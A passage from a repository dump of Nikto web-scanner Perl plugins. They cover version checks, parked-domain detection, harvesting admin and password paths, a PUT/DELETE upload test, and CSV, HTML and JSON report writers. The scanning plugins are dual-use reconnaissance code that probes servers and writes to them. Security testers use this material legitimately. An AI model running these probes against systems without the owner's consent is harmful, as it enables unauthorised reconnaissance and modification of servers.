$mark->{'components'}->{$item} = 1;\n        }\n    }\n\n    # Some specific (and common) banner processing\n    # WebLogic: strip all the date info...\n    elsif ($mark->{'banner'} =~ /weblogic/i) {\n        my @T = split(/ /, $mark->{'banner'});\n        $mark->{'components'}->{ $T[0] . '\\/' . $T[1] } = 1;\n    }\n\n    # SiteScope: strip all the date info...\n    elsif ($mark->{'banner'} =~ /sitescope/i) {\n        my @T = split(/ /, $mark->{'banner'});\n        $mark->{'components'}->{ $T[0] } = 1;\n    }\n\n    # Jetty: strip the ( ) away:\n    elsif ($mark->{'banner'} =~ /jetty\\(/i) {\n        $mark->{'banner'} =~ /Jetty\\(([0-9a-zA-Z.\\-]+)\\)/i;\n        $mark->{'components'}->{ 'Jetty/' . $1 } = 1;\n    }\n\n    # Some, like WEBrick, have multiple items but no spaces\n    elsif (($mark->{'banner'} !~ /\\s/) && ($mark->{'banner'} =~ /\\/.*\\//) && ($mark->{'banner'} =~ /\\(/)) {\n\n        # try converting () t spaces\n        foreach my $item (split(/[\\(\\)]/, $mark->{'banner'})) {\n            $mark->{'components'}->{$item} = 1;\n        }\n    }\n\n    # Finally, unknown banners\n    else {\n\n        # use the last non 0-9 . a-z char as a sepr (' ', '-', '_' etc)\n        my $sepr = $mark->{'banner'};\n        $sepr =~ s/[a-zA-Z0-9\\.\\(\\)]//gi;\n        if ($sepr eq '') {\n            $MATCHSTRING = $mark->{'banner'};\n        }\n        else {\n            $sepr = substr($sepr, (length($sepr) - 1), 1);\n\n            # break up ID string on $sepr\n            my @T = split(/\\\\$sepr/, $mark->{'banner'});\n\n            # assume last is version...\n            for ($i = 0 ; $i < $#T ; $i++) { $MATCHSTRING .= \"$T[$i] \"; }\n        }\n        $MATCHSTRING =~ s/\\s+$//;\n        $mark->{'components'}->{$MATCHSTRING} = 1;\n        nprint(\"Server Version String:$MATCHSTRING\", \"d\");\n    }\n\n    my ($v, $V, $BI, $k) = \"\";\n\n    # For each running component\n    foreach $BI (keys %{ $mark->{'components'} }) {\n        my $have_match = 0;\n\n        # Check it against each value from db_outdated\n        foreach $V (sort keys %OVERS) {\n            next if $V eq '';\n            if ($BI =~ /^$V/i)    # software name matched\n            {\n                $have_match = 1;\n\n                # nab version\n                foreach $k (keys %{ $OVERS{$V} }) {\n                    if ($k eq \"\")    { next; }\n                    if ($k eq \"tid\") { next; }\n                    $v = $k;\n                }\n\n                # do version check (return true if we should alert)\n                if (vereval($v, $BI, $V, $mark)) {\n                    my $msg = $OVERS{$V}{$v};\n                    $msg =~ s/\\@RUNNING_VER/$BI/g;\n                    $msg =~ s/\\@CURRENT_VER/$v/g;\n                    chomp($msg);\n                    add_vulnerability($mark, $msg, $OVERS{$V}{'tid'}, 0, \"HEAD\", \"/\");\n                }\n            }\n        }\n        if (!$have_match) { $mark->{'components'}->{'$BI'} = 2; }\n    }\n    return;\n}\n\n# do version evaluation\n# arguments:\n#\t0: latest version as defined in db_outdated\n#\t1: running item being evaluated\n#\t2: item being matched against in db_outdated\n#\t3: mark hash\nsub vereval {\n\n    # split both by last char of $_[2], as it is the name to version separator\n    my $sepr = substr($_[2], (length($_[2]) - 1), 1);\n    nprint(\"nikto_outdated.plugin: verstring: $_[2], sepr:$sepr\", \"d\");\n\n    my $CURRENT      = lc($_[0]);\n    my $RUNNING      = lc($_[1]);\n    my $CURRENT_ORIG = $CURRENT;\n    my $RUNNING_ORIG = $RUNNING;\n    my $mark         = $_[3];\n\n    nprint(\"nikto_outdated.plugin: \\$CURRENT:$CURRENT:\\$RUNNING:$RUNNING:\", \"d\");\n\n    my @T = split(/$sepr/, $CURRENT);\n    $CURRENT = $T[$#T];                    # should be version...\n    @T       = split(/$sepr/, $RUNNING);\n    $RUNNING = $T[$#T];                    # should be version...\n\n    # convert alphas to numerics so we can do a real comparison\n    $CURRENT =~ s/([^0-9\\.]){1}/\".\" . ord($1) . \".\"/eg;\n    $RUNNING =~ s/([^0-9\\.]){1}/\".\" . ord($1) . \".\"/eg;\n    $RUNNING =~ s/\\.+/\\./g;\n    $CURRENT =~ s/\\.+/\\./g;\n    $RUNNING =~ s/^\\.//;\n    $CURRENT =~ s/^\\.//;\n    $RUNNING =~ s/\\.$//;\n    $CURRENT =~ s/\\.$//;\n\n    nprint(\"nikto_outdated.plugin: \\$CURRENT:$CURRENT:\\$RUNNING:$RUNNING\\: (after numberifcation)\",\n           \"d\");\n\n    if (($CURRENT !~ /[a-z]/) && ($RUNNING !~ /[a-z]/)) {\n        @CUR = split(/\\./, $CURRENT);\n        @RUN = split(/\\./, $RUNNING);\n    }\n    else {\n        @CUR = split(//, $CURRENT);\n        @RUN = split(//, $RUNNING);\n    }\n\n    # start with 0... eval each in turn...\n    for (my $i = 0 ; $i <= $#CUR ; $i++) {\n        nprint(\"nikto_outdated.plugin: major compare: \\$CUR[$i]:$CUR[$i]: \\$RUN[$i]:$RUN[$i]:\",\n               \"d\");\n        if ($CUR[$i] > $RUN[$i]) { return 1; }    # running is older\n        if (($CUR[$i] ne \"\") && ($RUN[$i] eq \"\")) { return 1; }    # running is older\n        if ($CUR[$i] < $RUN[$i])                                   # running is newer\n        {\n            my $string = $_[1];\n            $string =~ s/\\s/\\%20/g;\n            $mark->{'components'}->{$string} = 2;\n            return 0;\n        }\n    }\n    return 0;    # running is the same version if we make it here\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_parked.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Determine if a domain is parked at a registrar or advertising location\n###############################################################################\nsub nikto_parked_init {\n    my $id = {\n           name        => \"parked\",\n           full_name   => \"Parked Detection\",\n           author      => \"Sullo\",\n           description => \"Checks to see whether the host is parked at a registrar or ad location.\",\n           hooks       => {\n                      scan   => { method => \\&nikto_parked, },\n                      weight => 18,\n                      },\n           copyright => \"2011 Chris Sullo\"\n           };\n    return $id;\n}\n\nsub nikto_parked {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $item->{'uri'}, \"GET\", \"\", \"\", \"\", \"parked detection\");\n\n    foreach my $string (keys %{ $VARIABLES->{'PARKEDSTRINGS'} }) {\n        return if $mark->{'terminate'};\n        $string = validate_and_fix_regex($string);\n        my @lines = split(/\\n/, $content);\n        foreach my $line (@lines) {\n\n            # Check for the matches and pull out information\n            if ($line =~ /$string/) {\n                add_vulnerability($mark, \"This domain appears to be parked\", 999968, 0, \"GET\", $item->{'uri'}, $request, $response);\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_paths.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2012 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Look at paths to help populate variables\n###############################################################################\nsub nikto_paths_init {\n    my $id = { name        => \"paths\",\n               full_name   => \"Path Search\",\n               author      => \"Sullo\",\n               description => \"Look at link paths to help populate variables\",\n               hooks       => {\n                          recon => { method => \\&nikto_paths,\n                                     weight => 20,\n                                     },\n                            },\n               copyright => \"2012 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_paths {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my (%DIRS, %FILES);\n    my ($res, $content) = nfetch($mark, \"/\", \"GET\", \"\", \"\", \"\", \"paths\");\n\n    if ($res eq 200) {\n\n        # get links\n        my @links = LW2::html_link_extractor($content);\n        foreach my $link (@links) {\n\n            # if not relative\n            if ($link !~ /^\\//) {\n\n                # check host\n                my @uri = LW2::uri_split($link);\n                if (   ($uri[2] eq $mark->{'hostname'})\n                    || ($uri[2] eq $mark->{'ip'})\n                    || ($uri[2] eq $mark->{'vhost'})\n                    || ($uri[2] eq $mark->{'ident'})) {\n                    $link = $uri[0];\n                }\n                else {\n                    next;\n                }\n            }\n\n            # normalize\n            $link = LW2::uri_normalize($link);\n\n            # split dirs / files\n            my $dir  = LW2::uri_get_dir($link);\n\t    $dir = validate_and_fix_regex($dir);\n            my $file = $link;\n            $file =~ s/^$dir//;\n\n            if ($file ne '') {\n                $file =~ s/\\\\//g;\n                $FILES{$file} = 1;\n            }\n\n            if (($dir ne '') && ($dir ne '/')) {\n                $dir =~ s/\\\\//g;\n                $DIRS{$dir} = 1;\n            }\n        }\n\n\t# Process whole link\n        if ($link =~ /\\.action(\\?|$)/i) {\n                $VARIABLES{\"\\@STRUTSACTIONS\"} .= \" $link\";\n\t}\n\n        # Now actually check the unique dirs/files\n        foreach my $file (keys %FILES) {\n            my $raw = $file;\n            $file = validate_and_fix_regex($file);\n\n            if ($file =~ /pass/i && $VARIABLES{\"\\@PASSWORDFILES\"} !~ /$file/i) {\n                $VARIABLES{\"\\@PASSWORDFILES\"} .= \" $raw\";\n            }\n        }\n\n        foreach my $dir (keys %DIRS) {\n            $dir = validate_and_fix_regex($dir);\n\n            # Other vars\n            if ($dir =~ /cgi/ && $VARIABLES{\"\\@CGIDIRS\"} !~ /$dir/) {\n                $VARIABLES{\"\\@CGIDIRS\"} .= \" $dir\";\n            }\n            if ($dir =~ /forum/ && $VARIABLES{\"\\@NUKE\"} !~ /$dir/) {\n                $VARIABLES{\"\\@NUKE\"} .= \" $dir\";\n            }\n            if ($dir =~ /pass/ && $VARIABLES{\"\\@PASSWORDDIRS\"} !~ /$dir/) {\n                $VARIABLES{\"\\@PASSWORDDIRS\"} .= \" $dir\";\n            }\n            if ($dir =~ /nuke/i && $VARIABLES{\"\\@NUKE\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@NUKE\"} .= \" $dir\";\n            }\n            if ($dir =~ /admin/i && $VARIABLES{\"\\@ADMIN\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@ADMIN\"} .= \" $dir\";\n            }\n            if ($dir =~ /phpmy/i && $VARIABLES{\"\\@PHPMYADMIN\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@PHPMYADMIN\"} .= \" $dir\";\n            }\n            if ($dir =~ /fck/i && $VARIABLES{\"\\@FCKEDITOR\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@FCKEDITOR\"} .= \" $dir\";\n            }\n            if ($dir =~ /crystal/i && $VARIABLES{\"\\@CRYSTALREPORTS\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@CRYSTALREPORTS\"} .= \" $dir\";\n            }\n        }\n\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_put_del_test.plugin",
    "content": "#VERSION,2.04\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Try put and then delete a file\n###############################################################################\nsub nikto_put_del_test_init {\n    my $id = { name      => \"put_del_test\",\n               full_name => \"Put/Delete test\",\n               author    => \"Sullo\",\n               description =>\n                 \"Attempts to upload and delete files through the PUT and DELETE HTTP methods.\",\n               hooks     => { scan => { method => \\&nikto_put_del_test, }, },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_put_del_test {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my $msg;\n\n    # PUT a page\n    my $uri = \"/nikto-test-\" . LW2::utils_randstr(8) . \".html\";\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"PUT\", \"This was a Nikto test.\", \"\", \"\", \"put_del_test: PUT\");\n\n    # Request it back\n    if ($res eq 201) {\n        ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"put_del_test: GET\");\n        if ($content =~ /This was a Nikto test/) {\n            add_vulnerability($mark, \"HTTP method 'PUT' allows clients to save files on the web server.\", 999995, 397, \"PUT\", $uri, $request, $response);\n\n            # we were able to put it there--can we delete it?\n            ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"DELETE\", \"\", \"\", \"\", \"put_del_test: DELETE\");\n            if ($res eq 200) {\n                ($res, $content, $error, $request, $response) = nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"put_del_test: GET\");\n                if ($content !~ /This was a Nikto test/)    # gone now\n                {\n                    add_vulnerability($mark, \"HTTP method 'DELETE' allows clients to delete files on the web server.\", 999994, 5646, \"DELETE\", $uri, $request, $response);\n                }\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_csv.plugin",
    "content": "#VERSION,2.07\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# CSV Reporting\n###############################################################################\nsub nikto_report_csv_init {\n    my $id = { name              => \"report_csv\",\n               full_name         => \"CSV reports\",\n               author            => \"Tautology\",\n               description       => \"Produces a CSV report.\",\n               report_head       => \\&csv_open,\n               report_host_start => \\&csv_host_start,\n               report_item       => \\&csv_item,\n               report_format     => 'csv',\n               copyright         => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub csv_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file and produce header\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Write header\n    print OUT \"\\\"$VARIABLES{'name'} - v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\\"\\n\";\n    return OUT;\n}\n\n###############################################################################\n# start output\nsub csv_host_start {\n    my ($handle, $mark) = @_;\n    $mark->{'banner'} =~ s/\"/\\\\\"/g;\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    print $handle \"\\\"\" . csv_safecell($hostname) . \"\\\",\"\n      . \"\\\"\" . csv_safecell($mark->{'ip'}) . \"\\\",\"\n      . \"\\\"\" . csv_safecell($mark->{'port'}) . \"\\\",\" . \"\\\"\\\",\" . \"\\\"\\\",\" . \"\\\"\\\",\"\n      . \"\\\"\" . csv_safecell($mark->{'banner'}) . \"\\\"\\n\";\n    return;\n}\n\n###############################################################################\n# print an item\nsub csv_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my $line = '';\n    \tmy $hostname = $item->{'mark'}->{'vhost'} ? $item->{'mark'}->{'vhost'} : $item->{'mark'}->{'hostname'};\n        $line .= \"\\\"\" . csv_safecell($hostname) . \"\\\",\";\n        $line .= \"\\\"\" . csv_safecell($item->{'mark'}->{'ip'}) . \"\\\",\";\n        $line .= \"\\\"\" . csv_safecell($item->{'mark'}->{'port'}) . \"\\\",\";\n\n        $line .= \"\\\"\";\n        if ($item->{'osvdb'} ne '') { $line .= \"OSVDB-\" . $item->{'osvdb'}; }\n        $line .= \"\\\",\";\n\n        $line .= \"\\\"\";\n        if ($item->{'method'} ne '') { $line .= $item->{'method'}; }\n        $line .= \"\\\",\";\n\n        $line .= \"\\\"\";\n        if (($uri ne '') && ($mark->{'root'} ne '') && ($uri !~ /^$mark->{'root'}/))\n\t\t\t{ $line .= csv_safecell($mark->{'root'}) . $uri; }\n\t\telse { $line .= csv_safecell($uri); }\n        $line .= \"\\\",\";\n\n\tmy $msg = $item->{'message'};\n\t$uri=quotemeta($uri);\n\tmy $root = quotemeta($mark->{'root'});\n\t$msg =~ s/^$uri:\\s//;\n\t$msg =~ s/^$root$uri:\\s//;\n        $msg =~ s/\"/\\\\\"/g;\n        $line .= \"\\\"\" . csv_safecell($msg) .\"\\\"\";\n        print $handle \"$line\\n\";\n    }\n}\n\n###############################################################################\n# prevent CSV injection attacks\nsub csv_safecell {\n    my $celldata = $_[0] || return;\n    if ($celldata =~ /^[=+@-]/) { $celldata = \"'\" . $celldata; }\n    return $celldata;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_html.plugin",
    "content": "#VERSION,2.06\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# HTML Reporting\n###############################################################################\nsub nikto_report_html_init {\n    my $id = { name              => \"report_html\",\n               full_name         => \"Report as HTML\",\n               author            => \"Sullo/Jabra\",\n               description       => \"Produces an HTML report.\",\n               report_head       => \\&html_head,\n               report_summary    => \\&html_summary,\n               report_host_start => \\&html_host_start,\n               report_host_end   => \\&html_host_end,\n               report_item       => \\&html_item,\n               report_close      => \\&html_close,\n               report_format     => 'htm',\n               copyright         => \"2008 Chris Sullo\"\n               };\n\n    # load up the templates now\n    html_open_templates();\n    return $id;\n}\n###############################################################################\nsub html_head {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Write header for html file, return file handle\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    my $html = html_change_vars($TEMPLATES{'htm_start'});\n    $html =~ s/\\#NIKTODTD#/$CONFIGFILE{'NIKTODTD'}/;\n    print OUT \"$html\";\n\n    return OUT;\n}\n###############################################################################\nsub html_close {\n    my ($handle, $mark) = @_;\n    my $html = html_change_vars($TEMPLATES{'htm_close'}, $mark);\n    print $handle \"$html\\n\";\n\n    close($handle);\n    return;\n}\n###############################################################################\nsub html_summary {\n    my ($handle, $mark) = @_;\n    my $html = html_change_vars($TEMPLATES{'htm_summary'}, $mark);\n    print $handle $html;\n\n    return;\n}\n###############################################################################\nsub html_host_start {\n    my ($handle, $mark) = @_;\n    my $html = html_change_vars($TEMPLATES{'htm_host_head'}, $mark);\n    print $handle \"$html\\n\";\n\n    return;\n}\n###############################################################################\nsub html_host_end {\n    my ($handle, $mark) = @_;\n    my $html = html_change_vars($TEMPLATES{'htm_end'}, $mark);\n    print $handle \"$html\\n\";\n\n    return;\n}\n###############################################################################\nsub html_item {\n    my ($handle, $mark, $item) = @_;\n    my $html = html_change_vars($TEMPLATES{'htm_host_item'}, $mark, $item);\n    print $handle \"$html\\n\";\n\n    return;\n}\n###############################################################################\nsub html_open_templates {\n    foreach my $t (dirlist($CONFIGFILE{'TEMPLATEDIR'}, \"htm.*\")) {\n        open(T, \"<$CONFIGFILE{'TEMPLATEDIR'}/$t\");\n        my @TEMPLATE = <T>;\n        close(T);\n        my $T = join(\"\", @TEMPLATE);\n        $t =~ s/\\..*$//;\n        $TEMPLATES{$t} = $T;\n    }\n\n    return;\n}\n###############################################################################\nsub html_change_vars {\n    my ($template, $mark, $item) = @_;\n    my %variables;\n    my $protocol = \"http\";\n    if ($mark->{'ssl'}) { $protocol .= \"s\"; }\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    $variables{\"#TEMPL_HCTR#\"}        = $VARIABLES{'TEMPL_HCTR'};\n    $variables{\"#TEMPL_END#\"}         = date_disp($mark->{'end_time'});\n    $variables{\"#TEMPL_HOSTNAME#\"}    = simple_enc($hostname);\n    $variables{\"#TEMPL_IP#\"}                 = simple_enc($mark->{'ip'});\n    $variables{\"#TEMPL_ITEMS_TESTED#\"}       = $COUNTERS{'total_checks'};\n    $variables{\"#TEMPL_PORT#\"}               = $mark->{'port'};\n    $variables{\"#TEMPL_NIKTO_VER#\"}          = $VARIABLES{'version'};\n    $variables{\"#TEMPL_BANNER#\"}             = simple_enc($mark->{'banner'});\n    $variables{\"#TEMPL_NIKTO_CLI#\"}          = $CLI{'all_options'};\n    $variables{\"#TEMPL_CTR#\"}                = $COUNTERS{'total_checks'};\n    $variables{\"#TEMPL_NIKTO_HOSTS_TESTED#\"} = $COUNTERS{'hosts_completed'};\n    $variables{\"#TEMPL_LINK_IP#\"} =\n      $protocol . \"://\" . $mark->{'ip'} . \":\" . $mark->{'port'} . $mark->{'root'};\n    if ($variables{\"#TEMPL_LINK_IP#\"} !~ /\\/$/) { $variables{\"#TEMPL_LINK_IP#\"} .= '/'; }\n    $variables{\"#TEMPL_ITEMS_FOUND#\"}  = $mark->{'total_vulns'};\n    $variables{\"#TEMPL_SCAN_START#\"}   = localtime($COUNTERS{'scan_start'});\n    $variables{\"#TEMPL_SCAN_END#\"}     = localtime($COUNTERS{'scan_end'});\n    $variables{\"#TEMPL_SCAN_ELAPSED#\"} = $COUNTERS{'scan_elapsed'} . \" seconds\";\n    $variables{\"#TEMPL_STATISTICS#\"} =\n      \"$COUNTERS{'totalrequests'} requests, $mark->{'total_errors'} errors, $mark->{'total_vulns'} findings\";\n    $variables{\"#TEMPL_START#\"}   = date_disp($mark->{'start_time'});\n    $variables{\"#TEMPL_ELAPSED#\"} = $mark->{'end_time'} - $mark->{'start_time'};\n\n    $variables{\"#TEMPL_LINK_NAME#\"} = \"N/A\";\n    if ($hostname ne \"\") {\n        $variables{\"#TEMPL_LINK_NAME#\"} =\n          $protocol . \"://\" . $hostname . \":\" . $mark->{'port'} . $mark->{'root'};\n    }\n    if ($variables{\"#TEMPL_LINK_NAME#\"} !~ /\\/$/) { $variables{\"#TEMPL_LINK_NAME#\"} .= '/'; }\n\n    $variables{\"#ID#\"} = $item->{'nikto_id'};\n\n    # OSVDB info\n    my $refs = \"\";\n    my $OSVDB = $item->{'osvdb'};\n    if ($OSVDB !~ /\\d+/) { $OSVDB = 0; }\n    if ($OSVDB != 0) {\n        $refs = \"<a href='https://vulners.com/osvdb/OSVDB:\" . $OSVDB .\"'>OSVDB-\" . $OSVDB . \"</a>\";\n        }\n\n    $variables{\"#TEMPL_REFERENCES#\"} = $refs;\n\n    # Scanner Messages Handling\n    $variables{\"#TEMPL_SMMSG#\"} = $item->{'message'};\n\n    # Positives Handling\n    if ($template =~ /\\#TEMPL_MSG#/) {\n        my $msg = simple_enc($item->{'message'});\n\n        # Message & handling for customized html output\n        # 740000 = multiple index files -- linkify file names\n        if ($item->{'nikto_id'} == 740000) {\n            $item->{'message'} =~ /^(.*: )(.*)$/;\n            $msg = $1;\n            my @links;\n            foreach my $f (parse_csv($2)) {    #@files) {\n                $f =~ s/\\s//g;\n                next if $f eq '';\n                push(@links,\n                     \"<a href=\\\"$protocol://$mark->{'display_name'}:$mark->{'port'}/$f\\\">$f</a>\");\n            }\n            $msg .= join(\", \", @links);\n        }\n\n  \tmy $uri = $item->{'uri'};\n        if (($uri ne '') && ($uri !~ /^$mark->{'root'}/))\n\t\t{ $uri = $mark->{'root'} . $uri; }\n        $variables{\"#TEMPL_URI#\"}         = simple_enc($uri);\n        $variables{\"#TEMPL_MSG#\"}         = $msg;\n        $variables{\"#TEMPL_HTTP_METHOD#\"} = simple_enc($item->{'method'});\n        $variables{\"#TEMPL_ITEM_IP_LINK#\"} =\n          \"$protocol://$variables{\\\"#TEMPL_IP#\\\"}:$mark->{'port'}$variables{\\\"#TEMPL_URI#\\\"}\";\n        $variables{\"#TEMPL_ITEM_NAME_LINK#\"} = \"\";\n        if ($hostname ne \"\") {\n            $variables{\"#TEMPL_ITEM_NAME_LINK#\"} = \"$protocol://$hostname:$mark->{'port'}$variables{\\\"#TEMPL_URI#\\\"}\";\n        }\n    }\n\n    foreach my $var (keys %variables) {\n        $template =~ s/$var/$variables{$var}/g;\n    }\n\n    return $template;\n}\n###############################################################################\nsub simple_enc {\n    my $var = $_[0] || return;\n    $var =~ s/</&lt;/g;\n    $var =~ s/>/&gt;/g;\n    $var =~ s/\"/&quot;/g;\n    return $var;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_json.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2016 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# JSON Reporting\n###############################################################################\nsub nikto_report_json_init {\n    my $id = { name              => \"report_json\",\n               full_name         => \"JSON reports\",\n               author            => \"Gijs Kwakkel\",\n               description       => \"Produces a JSON report.\",\n               report_head       => \\&json_open,\n               report_host_start => \\&json_host_start,\n               report_host_end   => \\&json_host_end,\n               report_close      => \\&json_close,\n               report_item       => \\&json_item,\n               report_format     => 'json',\n               copyright         => \"2016 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub json_open {\n    my ($file) = @_;\n\n    # Open file and produce header\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Write header\n#    print OUT \"\\\"$VARIABLES{'name'} - v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\\"\\n\";\n    return OUT;\n}\n\n###############################################################################\n# start output\nsub json_host_start {\n    my ($handle, $mark) = @_;\n    $mark->{'banner'} =~ s/\"/\\\\\"/g;\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    print $handle \"{\\\"host\\\":\\\"$hostname\\\",\"\n      . \"\\\"ip\\\":\\\"$mark->{'ip'}\\\",\"\n      . \"\\\"port\\\":\\\"$mark->{'port'}\\\",\"\n      . \"\\\"banner\\\":\\\"$mark->{'banner'}\\\",\"\n      . \"\\\"vulnerabilities\\\":[\";\n    return;\n}\n###############################################################################\n# end output\nsub json_host_end {\n    my ($handle, $mark) = @_;\n    print $handle \"]}\";\n    return;\n}\n###############################################################################\n# close output file\nsub json_close {\n    my ($handle, $mark) = @_;\n    print $handle \"\\n\";\n    close($handle);\n    return OUT;\n}\n\nmy $json_item_count = 0;\n###############################################################################\n# print an item\nsub json_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my $line = '';\n        if ( $json_item_count ne 0 ) {\n            $line .= \",\";\n        }\n        $json_item_count++;\n        $line .= \"{\";\n\n        $line .= \"\\\"id\\\": \\\"\" .$item->{'nikto_id'} .\"\\\",\";\n        if ($item->{'osvdb'} ne '') { $line .= \"\\\"OSVDB\\\": \\\"\" .$item->{'osvdb'} .\"\\\",\"; }\n\n        if ($item->{'method'} ne '') { $line .= \"\\\"method\\\":\\\"\" .$item->{'method'} .\"\\\",\"; }\n\n        if (($uri ne '') && ($mark->{'root'} ne '') && ($uri !~ /^$mark->{'root'}/))\n\t\t\t{ $line .= \"\\\"url\\\":\\\"\" .$mark->{'root'} . $uri .\"\\\",\"; }\n\t\telse { $line .= \"\\\"url\\\":\\\"\" .$uri .\"\\\",\"; }\n\n\t\tmy $msg = $item->{'message'};\n\t\t$uri=quotemeta($uri);\n\t\tmy $root = quotemeta($mark->{'root'});\n\t\t$msg =~ s/^$uri:\\s//;\n\t\t$msg =~ s/^$root$uri:\\s//;\n        $msg =~ s/\"/\\\\\"/g;\n        $line .= \"\\\"msg\\\":\\\"$msg\\\"\";\n        $line .= \"}\";\n        print $handle \"$line\";\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_nbe.plugin",
